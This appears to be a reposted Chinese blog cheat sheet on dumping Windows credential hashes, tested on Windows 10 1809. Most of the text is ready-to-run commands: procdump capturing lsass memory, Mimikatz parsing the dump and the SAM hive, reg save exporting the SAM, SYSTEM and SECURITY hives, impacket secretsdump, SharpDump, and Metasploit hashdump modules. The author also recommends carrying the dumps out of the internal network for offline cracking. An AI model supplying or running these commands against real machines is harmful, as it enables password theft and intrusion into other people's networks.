内容简介:测试机器: Windows 10 1809Procdump(管理员权限下运行)
推荐使用 Procdump,reg 和 sharpdump 导出本地,再想办法从内网中运出来本地破解
测试机器: Windows 10 1809
0x01 Procdump + Mimikatz
Procdump
(管理员权限下运行)
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits
然后本地解出hash即可
sekurlsa::minidump C:\lsass.dmp sekurlsa::logonpasswords full
0x02 Reg + impacket/Mimikatz (强推)
使用 Reg 需要NT/SYSTEM权限
reg save HKLM\SYSTEM system.hiv reg save HKLM\SAM sam.hiv reg save HKLM\security security.hiv
Mimikatz 调用 lsadump
lsadump::sam /system:system.hiv /sam:sam.hiv
impacket/secretsdump.py
python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL
0x03 Sharpdump (强推)
Out-Minidump.ps1 的 C#版本 编译结果
需要.NET 3.5版本框架
0x04 Wce、Quarks PwDump、GetPass……
没怎么用过,都是以前比较老的,Getpass是Mimikatz的编译版本,没啥意思
0x05 Msf modules
hashdump
条件:
- Meterpreter Session
- NT/SYSTEM
hashdump只能dump本地用户
smart_hashdump
条件
- Meterpreter Session
- NT/SYSTEM
可以dump本地 + 域用户hash
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- 如何使用代理IP进行数据抓取,PHP爬虫抓取亚马逊商品数据
- 抓取 Grafana Panel 视图
- Python爬虫:抓取新浪新闻数据
- Python抓取花瓣网高清美图
- Python爬虫:抓取新浪新闻数据
- 灵巧工业机器人(一)抓取
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Base64 编码/解码
Base64 编码/解码
html转js在线工具
html转js在线工具